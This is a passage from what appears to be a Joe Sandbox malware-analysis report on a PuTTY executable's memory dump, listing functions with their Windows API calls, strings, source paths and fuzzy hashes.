Instruction Fuzzy Hash: 36E0ED70105621ABDB216B39BC0CEEB7BACFF4A3137148269F519E21A1D7348943C5A9

Uniqueness

Uniqueness Score: -1.00%

Function 00183330 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 84
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendDlgItemMessageA.USER32(?,?,00000143,00000000,?), ref: 001833D5
SendDlgItemMessageA.USER32(?,?,00000151,00000000,?), ref: 001833E6

Strings

c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 00183380
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c, xrefs: 0018337B

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: ItemMessageSend
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c$c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
API String ID: 3015471070-2774982218
Opcode ID: 995704a7154604ef2745c24c55ad09267033783d7026f7df9c2de247868020cc
Instruction ID: 1a9b3540961a47b43e0cece84d9d6e74277847c5a5515e250ad738cac5c57a00
Opcode Fuzzy Hash: 995704a7154604ef2745c24c55ad09267033783d7026f7df9c2de247868020cc
Instruction Fuzzy Hash: 2B21E470604304EFEB24AB04DC95F3673A5FB89B04F184128E919476A1DBB2AF14CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00184450 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentProcessExplicitAppUserModelID.SHELL32(00000000,0016472A), ref: 00184468
GetProcAddress.KERNEL32(00000000,SetCurrentProcessExplicitAppUserModelID), ref: 00184490

Strings

SetCurrentProcessExplicitAppUserModelID, xrefs: 0018448A
Shell32.dll, xrefs: 00184474

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: AddressCurrentExplicitModelProcProcessUser
String ID: SetCurrentProcessExplicitAppUserModelID$Shell32.dll
API String ID: 3773935857-666802935
Opcode ID: f69d19fd7b4367380509759bb1f9ccae8ce70ce470b3ff8303ff4c9d354739cc
Instruction ID: a9d7173249dfc840319981fc596543a555c12fd7aa95e9e6b20556dd71790059
Opcode Fuzzy Hash: f69d19fd7b4367380509759bb1f9ccae8ce70ce470b3ff8303ff4c9d354739cc
Instruction Fuzzy Hash: 42E09274690703DBEB14FF36BD6DB1236986B10B81B058020E811D21B0EFB0C548EF26

Uniqueness

Uniqueness Score: -1.00%

Function 0019BC00 Relevance: 6.1, APIs: 4, Instructions: 72
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 0019BC76
RegOpenKeyExA.KERNELBASE(?,?,00000000,0002001F), ref: 0019BC9A
RegCloseKey.ADVAPI32(?), ref: 0019BCA6
RegCloseKey.ADVAPI32(?), ref: 0019BCBA

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: Close$CreateOpen
String ID:
API String ID: 1299239824-0
Opcode ID: 5bc69702b843e84301f19fe28c928e0457ea1505ab3d82df88b800fd79545d49
Instruction ID: c6fb75b8b76af6049b1f5abd6e53983aeff1f072a1c11a78a8b5906a8ea7560f
Opcode Fuzzy Hash: 5bc69702b843e84301f19fe28c928e0457ea1505ab3d82df88b800fd79545d49
Instruction Fuzzy Hash: 7811B13024C315ABEB248B14FECAB7B7BE8AF84B54F15401CF9495B280CB70AC40D656

Uniqueness

Uniqueness Score: -1.00%

Function 0017D6E0 Relevance: 6.0, APIs: 4, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDialogParamA.USER32(0000006F,00000000,0017D720,00000000,?), ref: 0017D6F2
ShowWindow.USER32(00000000,00000000), ref: 0017D6FD
SetActiveWindow.USER32(00000000), ref: 0017D704
KiUserCallbackDispatcher.NTDLL(00000000), ref: 0017D70B

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: Window$ActiveCallbackCreateDialogDispatcherParamShowUser
String ID:
API String ID: 916146323-0
Opcode ID: 5713158b320c399a9352084558ab712258fcf9d415ffab50e5a20bc244e7d35a
Instruction ID: 3e10ac18523ffc66f4b866a86218af97ecc877dde8257df43cc4fc298125c9a7
Opcode Fuzzy Hash: 5713158b320c399a9352084558ab712258fcf9d415ffab50e5a20bc244e7d35a
Instruction Fuzzy Hash: 07D09231285720BBE6312B60BC0EF9ABA68EF0DB57F108110F605E50E087B529428AAD

Uniqueness

Uniqueness Score: -1.00%

Function 00183780 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetDlgItemTextA.USER32(?,?,00000000), ref: 0018380C

Strings

false && "bad control type in label_change", xrefs: 00183848
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c, xrefs: 001837C5, 00183843

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: ItemText
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c$false && "bad control type in label_change"
API String ID: 3367045223-1645433261
Opcode ID: 9e3b175f61b50b322f4cbc8d7ac777c7cf666946c61b1107bd25b1ed94c802b6
Instruction ID: d1625798dff15c774eadfeb6032b5bd154affa3d310f90397ef15810f7969087
Opcode Fuzzy Hash: 9e3b175f61b50b322f4cbc8d7ac777c7cf666946c61b1107bd25b1ed94c802b6
Instruction Fuzzy Hash: 052124B26042046BC721EF24DC86A0A37F5DF96B55F1A0128F82893292D731EF15CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00183280 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendDlgItemMessageA.USER32(?,?,00000143,00000000,?), ref: 00183307

Strings

c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 001832CC
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c, xrefs: 001832C7

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: ItemMessageSend
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c$c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
API String ID: 3015471070-2774982218
Opcode ID: 3963331b4393e404500a3d8e1a1e6d17fe5882c1e23f78fafddc88b57ea38a90
Instruction ID: 6ff0156e82c8180b633541a45165eae40e34d4d98f5b0edb1c9ef5e498f7e901
Opcode Fuzzy Hash: 3963331b4393e404500a3d8e1a1e6d17fe5882c1e23f78fafddc88b57ea38a90
Instruction Fuzzy Hash: B1112170700309AFEB20AB04DC89B2273A6FB9AB11F084129F516876A0D771AF54CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00183020 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetDlgItemTextA.USER32(?,?,?), ref: 0018309A

Strings

c && c->ctrl->type == CTRL_EDITBOX, xrefs: 00183083
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c, xrefs: 0018307E

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: ItemText
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c$c && c->ctrl->type == CTRL_EDITBOX
API String ID: 3367045223-4089354181
Opcode ID: 74a019a7d6f0df7d6fcfdda772e014078c1cf005b2adaf4fc38af26dd92e3512
Instruction ID: 5a65713bd12c45dfde92573cec8f8150617d08abc9464985c022177a0e49efa9
Opcode Fuzzy Hash: 74a019a7d6f0df7d6fcfdda772e014078c1cf005b2adaf4fc38af26dd92e3512
Instruction Fuzzy Hash: C301A232604305EFD610DE58ECC5E16B3E8FB99B49F150025F95493211D372AE28DFA6

Uniqueness

Uniqueness Score: -1.00%

Function 002162C4 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,?,002138E0,00000001,00000364,?,00000006,000000FF,?,0020DB13,00000003,?,?,0019B059), ref: 00216305

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1256c54bafa661a7c2095ae9216e658a21e21b5a4727a9a8ef835ab86aa125fc
Instruction ID: 78a0e0ba5a31194a5db7aef0faba08960d161336a1b42525f874164dcca26bbe
Opcode Fuzzy Hash: 1256c54bafa661a7c2095ae9216e658a21e21b5a4727a9a8ef835ab86aa125fc
Instruction Fuzzy Hash: 15F0B43262462566DB215F629C0DBDF77D8AF61B60B258562EC18DB091DA70D8A086A0

Uniqueness

Uniqueness Score: -1.00%

Function 00215061 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0021435B,19E850E8,?,0021435B,00000220,?,0020E284,19E850E8), ref: 00215093

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0e2732fbd57877de0988c4cce7d13bc3f3af026ea91ab2910ba22d61f8c2f2fe
Instruction ID: 9171be7403fe7aa4053527859dafe199e454e77392153f3a13ecf65e4c00874e
Opcode Fuzzy Hash: 0e2732fbd57877de0988c4cce7d13bc3f3af026ea91ab2910ba22d61f8c2f2fe
Instruction Fuzzy Hash: 45E0A021520B32D6E7212EF59C05BDA76C8AFAD3A0F1141A0F81E96491DAA0CCA04AE4

Uniqueness

Uniqueness Score: -1.00%

Function 0019BAA0 Relevance: 1.5, APIs: 1, Instructions: 21libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 001C7510: GetSystemDirectoryA.KERNEL32(00000000,?), ref: 001C7522
Part of subcall function 001C7510: GetSystemDirectoryA.KERNEL32(00000000), ref: 001C7566

Part of subcall function 00198670: _strlen.LIBCMT ref: 00198687
Part of subcall function 00198670: _strlen.LIBCMT ref: 001986B1
Part of subcall function 00198670: _strcat.LIBCMT ref: 001986DC
Part of subcall function 00198670: _strlen.LIBCMT ref: 001986E5
Part of subcall function 00198670: _strcat.LIBCMT ref: 00198702
Part of subcall function 00198670: _strlen.LIBCMT ref: 0019870B

LoadLibraryA.KERNELBASE(00000000,00000000,?,001A9C90,kernel32.dll), ref: 0019BABF

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: _strlen$DirectorySystem_strcat$LibraryLoad
String ID:
API String ID: 3346121862-0
Opcode ID: 268e9b0ed6b8b051b0ea3c452e972faeb3500f484072b9225dbad071780ec45e
Instruction ID: 0bdd84226882fa1d123f79ec41c448bc78a4d2e6bf614482aa4a173deba04c5c
Opcode Fuzzy Hash: 268e9b0ed6b8b051b0ea3c452e972faeb3500f484072b9225dbad071780ec45e
Instruction Fuzzy Hash: 48D05B66A0421037DA1036787C0EE5B254CCFA6361F090964F808E7242F761AD1082E6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0017E280 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 262windowCOMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(?,00000000), ref: 0017E2C7
SendDlgItemMessageA.USER32(?,000003E9,00000192,00000002,00260020), ref: 0017E2E8
SendDlgItemMessageA.USER32(?,000003E9,00000180,00000000), ref: 0017E314
SendDlgItemMessageA.USER32(?,000003E9,00000180,00000000), ref: 0017E36B
GetParent.USER32(?), ref: 0017E392
SetActiveWindow.USER32(00000000), ref: 0017E399
DestroyWindow.USER32(?), ref: 0017E3A0
SendDlgItemMessageA.USER32(?,000003E9,00000190,00000000,00000000), ref: 0017E3DF
SendDlgItemMessageA.USER32(?,000003E9,00000191,00000000,00000000), ref: 0017E40F
_strlen.LIBCMT ref: 0017E456
MessageBeep.USER32(00000000), ref: 0017E485
_strlen.LIBCMT ref: 0017E4EE
SendDlgItemMessageA.USER32(?,000003E9,00000185,00000000,00000000), ref: 0017E5C1

Strings

%s Event Log, xrefs: 0017E2B6

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: Message$ItemSend$Window$_strlen$ActiveBeepDestroyParentText
String ID: %s Event Log
API String ID: 2560716093-583241876
Opcode ID: 830f9900941b61de18db33531a239f1dfb4582a5c5ca9285157f869e3294ba59
Instruction ID: 107777e12044d1e7bb39492c3f073a43ec0ca8d1173a865c70fec4b3630b292f
Opcode Fuzzy Hash: 830f9900941b61de18db33531a239f1dfb4582a5c5ca9285157f869e3294ba59
Instruction Fuzzy Hash: D291F471A44304AFEB249F24EC9AB6A33F4EB18704F048529F949D72D1E7B1E944CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00166150 Relevance: 15.1, APIs: 10, Instructions: 61clipboardwindowmemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00002002,?), ref: 0016616C
GlobalLock.KERNEL32(00000000), ref: 0016617D
GlobalUnlock.KERNEL32(00000000), ref: 001661A0
SendMessageA.USER32(00008002,00000001,00000000), ref: 001661B9
OpenClipboard.USER32 ref: 001661C5
EmptyClipboard.USER32 ref: 001661CF
SetClipboardData.USER32(00000001,00000000), ref: 001661D8
CloseClipboard.USER32 ref: 001661DE
SendMessageA.USER32(00008002,00000000,00000000), ref: 001661F7
GlobalFree.KERNEL32(00000000), ref: 00166203

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: ClipboardGlobal$MessageSend$AllocCloseDataEmptyFreeLockOpenUnlock
String ID:
API String ID: 1228832834-0
Opcode ID: c16d074f8688f4ebd7c9a075216a76f93b1cbb1357e34bc28e293fa6af42ccd1
Instruction ID: f212441aa09647378ef60fe17ce7f0e60e327fa6012f99bf80567a8eaa7b4aa4
Opcode Fuzzy Hash: c16d074f8688f4ebd7c9a075216a76f93b1cbb1357e34bc28e293fa6af42ccd1
Instruction Fuzzy Hash: B8119E31645341BFE7302F24BC0DF6B7BA8FB96782F044024F685861A1D7718811DB29

Uniqueness

Uniqueness Score: -1.00%

Function 00180090 Relevance: 13.9, APIs: 9, Instructions: 379windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32(?,?,00000180,00000000,002514DC), ref: 001800E5
SetWindowLongA.USER32(?,00000000,00000001), ref: 0018010B
SendDlgItemMessageA.USER32(?,?,00000188,00000000,00000000), ref: 00180155
SendDlgItemMessageA.USER32(?,?,0000018B,00000000,00000000), ref: 00180170
SendDlgItemMessageA.USER32(00000001,FFFFFFFF,00000182,?,00000000), ref: 001803ED
SendDlgItemMessageA.USER32(?,?,00000199,00000000,00000000), ref: 001804FD

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: ItemMessageSend$LongWindow
String ID:
API String ID: 1736968133-0
Opcode ID: d97479558f6322d69e81e8ad87021ab15fde04641a043cc26646f175b62ca8b1
Instruction ID: d920fac20f11f578343bed8e4b990068a1b5f58a291f4abeb8290e23b7d2405c
Opcode Fuzzy Hash: d97479558f6322d69e81e8ad87021ab15fde04641a043cc26646f175b62ca8b1
Instruction Fuzzy Hash: 09D1F231604304AFD7559F18DC88B2BBBE6AB88720F158A18FDA5973E1C770ED498F91

Uniqueness

Uniqueness Score: -1.00%

Function 00190100 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 144COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00190186

Strings

p - buf == maxlen, xrefs: 0019026A
y$, xrefs: 00190210
Cipher, xrefs: 0019027B
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/settings.c, xrefs: 00190265
%s%s, xrefs: 0019021A

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: _strlen
String ID: %s%s$/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/settings.c$Cipher$p - buf == maxlen$y$
API String ID: 4218353326-3291737052
Opcode ID: 7143c841f8b133dbde00621af5380967b14c8615253fd3056adfa17e95f8ef99
Instruction ID: 3c09c343e1473db991d498779673d421ce1a28eeabda98326d44f181bf9f66b7
Opcode Fuzzy Hash: 7143c841f8b133dbde00621af5380967b14c8615253fd3056adfa17e95f8ef99
Instruction Fuzzy Hash: F0414972A08304AFCF166E64DC4172AB6D9AF99B54F1A043CF949A7392E7B1DC108782

Uniqueness

Uniqueness Score: -1.00%

Function 001D8220 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000), ref: 001D8242
FindClose.KERNEL32(00000000), ref: 001D8259
FindWindowA.USER32(Pageant,Pageant), ref: 001D826D

Strings

Pageant, xrefs: 001D8263, 001D8268

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: Find$CloseFileFirstWindow
String ID: Pageant
API String ID: 2475344593-3220706369
Opcode ID: ac8f598bcc7e5a66821581d5512957ffd47a2a756ebf61db710c435cb5decefe
Instruction ID: 6143428cc2203720a735af0f2383a5fb37226c520fdb0ed8e3a6bda845d1aefc
Opcode Fuzzy Hash: ac8f598bcc7e5a66821581d5512957ffd47a2a756ebf61db710c435cb5decefe
Instruction Fuzzy Hash: 60F0E9717012006BC7313739BC4EABF7298AF5A725F090525F81EC72E0DB359815C697

Uniqueness

Uniqueness Score: -1.00%

Function 00168280 Relevance: 4.6, APIs: 3, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00198960: _strlen.LIBCMT ref: 00198970

IsIconic.USER32 ref: 001682D7
SetWindowTextW.USER32(00000000,?), ref: 001682F7
SetWindowTextA.USER32(00000000,00000000), ref: 00168315

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: TextWindow$Iconic_strlen
String ID:
API String ID: 1204891203-0
Opcode ID: ce31f8e42a1b0c62e738c94f529209bb18576ba87989fda85ff33be9fe23d488
Instruction ID: c87ec99a25a6b715344c9f515e7861ec1be34a2b849d319204dd3f62ba3522aa
Opcode Fuzzy Hash: ce31f8e42a1b0c62e738c94f529209bb18576ba87989fda85ff33be9fe23d488
Instruction Fuzzy Hash: F401DDB19002007BEF226B20BC4FF3B3664FB61755F0C4424F804921A2EB726974D795

Uniqueness

Uniqueness Score: -1.00%

Function 00168330 Relevance: 4.6, APIs: 3, Instructions: 52windowCOMMON

Download Yara Rule

APIs

